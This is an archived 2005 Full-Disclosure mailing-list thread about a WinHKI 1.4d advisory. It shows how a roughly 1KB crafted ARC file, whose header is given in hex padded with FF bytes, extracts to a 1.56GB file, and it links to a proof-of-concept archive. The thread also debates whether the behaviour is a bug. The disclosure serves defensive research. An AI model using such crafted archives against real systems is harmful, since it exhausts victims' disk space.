Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: Rafel Ivgi (rivgi_at_finjan.com)
Date: 01/11/05

  • Next message: Handy, Mark (IT): "RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?"
    To: "bipin gautam" <visitbipin@yahoo.com>, <full-disclosure@lists.netsys.com>
    Date: Tue, 11 Jan 2005 17:44:40 +0200
    
    

    The original file wasn't a 1.56 with null that were compressed, it was a
    smal file with 1024 FF's which was extracted to a
    1.56 of nulls...that is not obvious, that is a bug.

    Rafel Ivgi
    Security Consultant

    ----- Original Message -----
    From: "bipin gautam" <visitbipin@yahoo.com>
    To: <full-disclosure@lists.netsys.com>
    Sent: Saturday, January 08, 2005 11:29 AM
    Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

    > that's obvious isn't it... say... if you create a few
    > GB file with null characters, 0X00 and compress
    > it...... that will produce a similar result. such
    > issue is known for any file compress utility for ages.
    >
    >
    > any... software will do the same! try it. and THAT'S
    > OBVIOUS!
    > --- "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
    > wrote:
    >
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> Application: WinHKI
    >> Vendors: http://www.webtoolmaster.com
    >> Versions: 1.4d
    >> Platforms: Windows
    >> Bug: ARC File Extraction of 1KB to 1.56GB
    >> Exploitation: Local (extract file)
    >> Date: 24 Dec 2004
    >> Author: Rafel Ivgi, The-Insider
    >> E-Mail: the_insider@mail.com
    >> Website: http://theinsider.deep-ice.com
    >>
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> 1) Introduction
    >> 2) Bugs
    >> 3) The Code
    >>
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ===============
    >> 1) Introduction
    >> ===============
    >>
    >> WinHKI is a file archiever which supports: ARC, BH,
    >> CAB, HKI, JAR, LHA,TAR,
    >>
    >> GZ compressions.
    >>
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ======
    >> 2) Bug
    >> ======
    >>
    >> This is a normal CAB compressed file header
    >>
    >> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
    >> ..251.HTM.^^^^^.
    >> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363
    >> ...x19s......<sc
    >> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73
    >> ript.>alert()</s
    >> 00000030 6372 6970 743E 0D0A 1A00
    >> cript>....
    >>
    >> By adding after the filename header a certain amount
    >> of chars
    >> and replacing all nulls (00) with FF (in order to
    >> avoid our
    >> long string from being terminated)
    >>
    >> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
    >> ..251.HTM.^^^^^.
    >> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
    >> ................
    >> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B
    >> ................
    >> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363
    >> ...x19s......<sc
    >> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73
    >> ript.>alert()</s
    >> 00000430 6372 6970 743E 0D0A 1A00
    >> cript>....
    >>
    >>
    >> HKI will create a 1.56 GIGA BYTE file on at the
    >> selected extract location.
    >>
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ===========
    >> 3) The Code
    >> ===========
    >>
    >> An online proof of concept can be found at:
    >> http://theinsider.deep-ice.com/hki156gb.ARC
    >>
    >>
    > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ---
    >> Rafel Ivgi, The-Insider
    >> http://theinsider.deep-ice.com
    >>
    >> "Scripts and Codes will make me D.O.S , but they
    >> will never HACK me."
    >>
    >> _______________________________________________
    >> Full-Disclosure - We believe in it.
    >> Charter:
    >> http://lists.netsys.com/full-disclosure-charter.html
    >>
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Yahoo! Mail - Easier than ever with enhanced search. Learn more.
    > http://info.mail.yahoo.com/mail_250
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html

    -----------------------------------------------
    This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Handy, Mark (IT): "RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?"

    Relevant Pages

    • Re: Attach pics and files
      ... I'm not a Yahoo user so don't know much about it... ... Just go to the Yahoo site and manage your mail... ... including attachments. ... trying to compress and e-mail the document... ...
      (microsoft.public.windowsxp.photos)
    • Re: java.util.zip.ZipException using ZipUtils from MSDNmag
      ... compress & uncompress the Zip File. ... public static void CopyStream(java.io.InputStream from, ... public static ZipFile UpdateZipFile(ZipFile file, FilterEntryMethod filter, ... he claims that Microsoft has agreed this as a bug. ...
      (microsoft.public.dotnet.framework.windowsforms)
    • Re: Has anyone HEARD 5.1 Love yet? ( Terra )
      ... I never read email at the Yahoo address! ... instead of going for quality sound on DVD, they want to compress the shit ... reality, in REALITY, music does not, or is not meant to, run circles ...
      (rec.music.beatles)
    • Re: Is /bin/zip large file aware?
      ... What's wrong with bzip2, gzip, or compress (all of which are ... zip's large-file awareness is a bit of a strange thing. ... I'll file the bug, though. ...
      (comp.unix.solaris)
    • Re: compress(vul) + ftpd(?)
      ... > name containing the shell code to exploit the bug. ... But wu-ftpd doesn`t allow/handle so long filenames. ... > I mentioned the compress bug back in 1998 and again in 2000, ... Compress in Red Hat 7.1 and 7.2 isnt fixed to this bug. ...
      (Vuln-Dev)